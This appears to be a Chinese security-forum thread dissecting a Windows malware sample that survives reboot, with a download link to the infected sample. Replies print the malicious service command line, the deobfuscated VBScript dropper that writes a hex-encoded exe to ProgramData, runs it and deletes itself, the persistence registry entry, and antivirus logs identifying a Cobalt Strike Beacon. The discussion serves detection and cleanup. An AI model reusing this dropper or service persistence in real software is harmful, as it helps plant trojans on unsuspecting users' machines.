一个关机回写的病毒样本，疑似rootkit

落华无痕

样本（infected）：https://free.lanzoue.com/iCWQS1rvefgf

用火绒专杀处理不掉，卡巴斯基杀毒也清理不掉，都是清理后重启复发。但是恢复环境里删除目录后不会复发。

384也7492374

S1 静态 kill

祸兮福所倚

t0kenzero

应该不是rootkit 你把注册表东西清一清就好了
msiserverkj.reg

1. cmd /c xcopy "C:\Windows\system32\Microsoft\private-88" "C:\ProgramData\Microsoft Setup" /i /e /y & "C:\ProgramData\Microsoft Setup\userinit.exe" //B //E:vbs "C:\ProgramData\Microsoft Setup\userinit.txt"

复制代码

userinit.txt

1. If Not CreateObject("Scripting.FileSystemObject").FolderExists(Wscript.CreateObject("Shell.Application").NameSpace(&H23).Self.Path + "\Microsoft Setup") Then
   
2. CreateObject("Scripting.FileSystemObject").CreateFolder(Wscript.CreateObject("Shell.Application").NameSpace(&H23).Self.Path + "\Microsoft Setup")
   
3. End If
   
4. Randomize()
   
5. CreateObject("Microsoft.XMLDOM").CreateElement("binary").DataType = "bin.hex"
   
6. CreateObject("Microsoft.XMLDOM").CreateElement("binary").Text = j3437
   
7. CreateObject("ADODB.Stream").Type = 1
   
8. CreateObject("ADODB.Stream").Open
   
9. CreateObject("ADODB.Stream").Write CreateObject("Microsoft.XMLDOM").CreateElement("binary").NodeTypedValue
   
10. CreateObject("ADODB.Stream").SaveToFile Wscript.CreateObject("Shell.Application").NameSpace(&H23).Self.Path + "\Microsoft Setup" + "" + Cstr(round(rnd * 999)) + ".exe", 2
    
11. CreateObject("ADODB.Stream").Close
    
12. If CreateObject("Scripting.FileSystemObject").FileExists(Wscript.CreateObject("Shell.Application").NameSpace(&H23).Self.Path + "\Microsoft Setup" + "" + Cstr(round(rnd * 999)) + ".exe") Then
    
13. Wscript.CreateObject("Wscript.Shell").Run chr(34) + Wscript.CreateObject("Shell.Application").NameSpace(&H23).Self.Path + "\Microsoft Setup" + "" + Cstr(round(rnd * 999)) + ".exe" + chr(34), 1, True
    
14. CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.CreateObject("Shell.Application").NameSpace(&H23).Self.Path + "\Microsoft Setup" + "" + Cstr(round(rnd * 999)) + ".exe")
    
15. End If
    
16. CreateObject("Scripting.FileSystemObject").DeleteFile(CreateObject("Scripting.FileSystemObject").GetFile(Wscript.ScriptFullName).path)
    
17. Wscript.Quit 0
    

复制代码

落华无痕

t0kenzero 发表于 2024-3-19 13:44
应该不是rootkit 你把注册表东西清一清就好了
msiserverkj.reg

注册表和文件夹我都删了的，后台进程检查了没有可疑的，然后重启又复发。
之后才写了个bat进恢复环境里重命名问题文件夹，之后就没再复发。

wowocock

落华无痕 发表于 2024-3-19 13:50
注册表和文件夹我都删了的，后台进程检查了没有可疑的，然后重启又复发。
之后才写了个bat进恢复环境里 ...

PT 1

        [RAB]00000110

EngFix :dwFixResult=1, bResult=1

[CAutoRun]Repair By ARR_V
        [70]        C:\ProgramData\Microsoft Setup\userinit.txt
        MD5:a492fab806f79d6ee1d33cd444999749

        径:SYSTEM\CurrentControlSet\Services\msiserverkj

        名:ImagePath

        值:cmd /c xcopy "C:\Windows\system32\Microsoft\private-88" "C:\ProgramData\Microsoft Setup" /i /e /y & "C:\ProgramData\Microsoft Setup\userinit.exe" //B //E:vbs "C:\ProgramData\Microsoft Setup\userinit.txt"

        类别:服务项 处理:移除文件 结果:1
测了下，用360急救箱扫描清除即可。

GreatMOLA

BD

\userinit_txt\userinit_txt\programdata\Microsoft Setup\853.exe - Gen:Suspicious.Cloud.2.wGW@aqqu56di

西风萧雨

事件: 对象已删除
用户: DINGDINGPC-MATE\丁丁
用户类型: 活动用户
组件: 病毒扫描
结果: 已删除
结果说明: 已删除
类型: 木马
名称: HEUR:Trojan.Script.Generic
精确度: 启发式分析
威胁级别: 高
对象类型: 文件
对象名称: userinit.txt
对象路径: D:\下载\userinit_txt (1)\userinit_txt\system32\microsoft\private-88
对象的 MD5: A492FAB806F79D6EE1D33CD444999749

DisaPDB

前面那段长得一批的就是shellcode了

1. <b>Dim s3533, b3137, v3937
   
2. Set s3533 = Wscript.CreateObject("Shell.Application")
   
3. Set b3137 = CreateObject("Scripting.FileSystemObject")
   
4. Set v3937 = Wscript.CreateObject("Wscript.Shell")
   
5. g3333 = s3533.NameSpace(&H23).Self.Path
   
6. j3735 = g3333 + "\Microsoft Setup"
   
7. q3831 = b3137.GetFile(Wscript.ScriptFullName).path
   
8. If Not b3137.FolderExists(j3735) Then
   
9. b3137.CreateFolder(j3735)
   
10. End If
    
11. Randomize()
    
12. b3839 = j3735 + "" + Cstr(round(rnd * 999)) + ".exe"
    
13. Dim q3335, a3739, d3830
    
14. Set a3739 = CreateObject("Microsoft.XMLDOM")
    
15. Set d3830 = a3739.CreateElement("binary")
    
16. d3830.DataType = "bin.hex"
    
17. d3830.Text = j3437
    
18. Set q3335 = CreateObject("ADODB.Stream")
    
19. q3335.Type = 1
    
20. q3335.Open
    
21. q3335.Write d3830.NodeTypedValue
    
22. q3335.SaveToFile b3839, 2
    
23. q3335.Close
    
24. Set q3335 = Nothing
    
25. Set d3830 = Nothing
    
26. Set a3739 = Nothing
    
27. If b3137.FileExists(b3839) Then
    
28. v3937.Run chr(34) + b3839 + chr(34), 1, True
    
29. b3137.DeleteFile(b3839)
    
30. End If
    
31. b3137.DeleteFile(q3831)
    
32. Set s3533 = Nothing
    
33. Set b3137 = Nothing
    
34. Set v3937 = Nothing
    
35. Wscript.Quit 0
    
36. </b>

复制代码

v3937.Run chr(34) + b3839 + chr(34), 1, True生成payload
注册表项目

1. Windows Registry Editor Version 5.00
   
2. 
   
3. [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msiserverkj]
   
4. "ImagePath"=hex:63,00,6d,00,64,00,20,00,2f,00,63,00,20,00,78,00,63,00,6f,00,70,\
   
5.   00,79,00,20,00,22,00,43,00,3a,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,77,00,\
   
6.   73,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,4d,00,69,\
   
7.   00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,5c,00,70,00,72,00,69,00,76,00,\
   
8.   61,00,74,00,65,00,2d,00,38,00,38,00,22,00,20,00,22,00,43,00,3a,00,5c,00,50,\
   
9.   00,72,00,6f,00,67,00,72,00,61,00,6d,00,44,00,61,00,74,00,61,00,5c,00,4d,00,\
   
10.   69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,53,00,65,00,74,00,75,\
    
11.   00,70,00,22,00,20,00,2f,00,69,00,20,00,2f,00,65,00,20,00,2f,00,79,00,20,00,\
    
12.   26,00,20,00,22,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,\
    
13.   00,44,00,61,00,74,00,61,00,5c,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,\
    
14.   66,00,74,00,20,00,53,00,65,00,74,00,75,00,70,00,5c,00,75,00,73,00,65,00,72,\
    
15.   00,69,00,6e,00,69,00,74,00,2e,00,65,00,78,00,65,00,22,00,20,00,2f,00,2f,00,\
    
16.   42,00,20,00,2f,00,2f,00,45,00,3a,00,76,00,62,00,73,00,20,00,22,00,43,00,3a,\
    
17.   00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,44,00,61,00,74,00,61,00,\
    
18.   5c,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,53,00,65,\
    
19.   00,74,00,75,00,70,00,5c,00,75,00,73,00,65,00,72,00,69,00,6e,00,69,00,74,00,\
    
20.   2e,00,74,00,78,00,74,00,22,00,00,00
    
21. "ObjectName"="LocalSystem"
    
22. "Group"="UIGroup"
    
23. "Start"=dword:00000002
    
24. "Type"=dword:00000010
    
25. "ErrorControl"=dword:00000001
    
26. 
    

复制代码

1. cmd /c xcopy "C:\Windows\system32\Microsoft\private-88" "C:\ProgramData\Microsoft Setup" /i /e /y && "C:\ProgramData\Microsoft Setup\userinit.exe" //B //E:vbs "C:\ProgramData\Microsoft Setup\userinit.txt"

复制代码

00000010没记错是驱动对应的值，并且这个服务项目是LocalSystem启动的，但是没看到相关其他内容，exe就交给大佬分析了

360目前拉黑

Fadouse

1. Time;Scanner;Object type;Object;Detection;Action;User;Information;Hash;First seen here
   
2. 
   
3. 3/19/2024 6:51:17 PM;Real-time file system protection;file;E:\Code\Virus\userinit_txt\programdata\Microsoft Setup\853.exe;a variant of Win64/CobaltStrike.Beacon.AX trojan;cleaned by deleting;LAPTOP\Fadouse;Event occurred on a new file created by the application: C:\Program Files\Bandizip\Bandizip.exe (AB7C5C3728A1B132444C69A31DA61541F2BF4B25).;D541124B2657EE5E80EA4BB3D075D2F036400612;3/19/2024 6:50:42 PM
   
4. 
   

复制代码